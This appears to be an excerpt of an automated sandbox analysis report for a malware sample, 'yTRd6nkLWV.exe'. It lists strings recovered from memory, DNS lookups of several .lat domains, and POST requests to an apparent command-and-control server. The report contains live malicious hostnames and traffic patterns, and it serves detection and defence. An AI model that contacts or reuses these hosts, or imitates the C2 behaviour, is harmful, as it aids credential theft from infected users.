itms-apps: itms-appss: ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-ovuBZL7C34mYkcNGttZRSDeZOHA=' equals www.yahoo.com (Yahoo)
Source: yTRd6nkLWV.exe | String found in binary or memory: cha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowe equals www.youtube.com (Youtube)
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: eropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-ovuBZL7C34mYkcNGttZRSDeZOHA=' equals www.yahoo.com (Yahoo)
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: oContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=207508de5b63d2f8b6c628c5; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35141Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 14 Jan 2025 07:55:30 GMTDateProxy-Connect equals www.youtube.com (Youtube)
Source: yTRd6nkLWV.exe | String found in binary or memory: ttp://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchf equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: shoefeatthe.lat
              Source: global trafficDNS traffic detected: DNS query: bloodyswif.lat
              Source: global trafficDNS traffic detected: DNS query: washyceehsu.lat
              Source: global trafficDNS traffic detected: DNS query: leggelatez.lat
              Source: global trafficDNS traffic detected: DNS query: miniatureyu.lat
              Source: global trafficDNS traffic detected: DNS query: kickykiduz.lat
              Source: global trafficDNS traffic detected: DNS query: savorraiykj.lat
              Source: global trafficDNS traffic detected: DNS query: finickypwk.lat
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: aleksandr-block.com
              Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
              Source: global trafficDNS traffic detected: DNS query: ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: yTRd6nkLWV.exeString found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
              Source: yTRd6nkLWV.exeString found in binary or memory: http://cevcsca2021.ocsp-certum.com07
              Source: yTRd6nkLWV.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
              Source: yTRd6nkLWV.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
              Source: yTRd6nkLWV.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: yTRd6nkLWV.exeString found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
              Source: yTRd6nkLWV.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
              Source: yTRd6nkLWV.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
              Source: yTRd6nkLWV.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: yTRd6nkLWV.exeString found in binary or memory: http://store.steampowered.com/subscriber_
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: yTRd6nkLWV.exeString found in binary or memory: http://subca.ocsp-certum.com01
              Source: yTRd6nkLWV.exeString found in binary or memory: http://subca.ocsp-certum.com02
              Source: yTRd6nkLWV.exeString found in binary or memory: http://subca.ocsp-certum.com05
              Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
              Source: yTRd6nkLWV.exeString found in binary or memory: http://www.certum.pl/CPS0
              Source: yTRd6nkLWV.exeString found in binary or memory: http://www.innosetup.com/
              Source: yTRd6nkLWV.exeString found in binary or memory: http://www.remobjects.com/ps
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1539997229.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/(w
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/2
              Source: yTRd6nkLWV.exe, 00000001.00000003.1499124135.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1501934748.00000000006E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/44
              Source: yTRd6nkLWV.exe, 00000001.00000003.1539997229.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/A4
              Source: yTRd6nkLWV.exe, 00000001.00000003.1486470955.00000000006FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/Q
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000690000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1557953970.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539498159.000000000339B000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1557953970.000000000339C000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339F000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1472950893.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486737049.00000000033A3000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1499794717.0000000003397000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539997229.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486212475.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528875799.000000000339A000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539498159.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.0000000000693000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/api
              Source: yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/apiA
              Source: yTRd6nkLWV.exe, 00000001.00000003.1528875799.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/apiaK
              Source: yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339C000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/apili
              Source: yTRd6nkLWV.exe, 00000001.00000003.1557953970.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539498159.000000000339E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/apizK
              Source: yTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/ob
              Source: yTRd6nkLWV.exe, 00000001.00000003.1472950893.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486212475.00000000033A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/pJ
              Source: yTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339F000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1472950893.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486212475.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/pi
              Source: yTRd6nkLWV.exe, 00000001.00000003.1473028075.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513898229.0000000000727000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1540482872.000000000069F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com:443/api
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drString found in binary or memory: https://assets.dropbox.com/www/en-us/illustrations/spot/target-miss.svg
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.0000000000675000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcom
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drString found in binary or memory: https://cfl.dropboxstatic.com/static/images/favicon.ico
              Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.f
              Source: yTRd6nkLWV.exe, 00000001.00000003.1558338882.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528399384.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.stea
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steam
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steamstatic.c
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
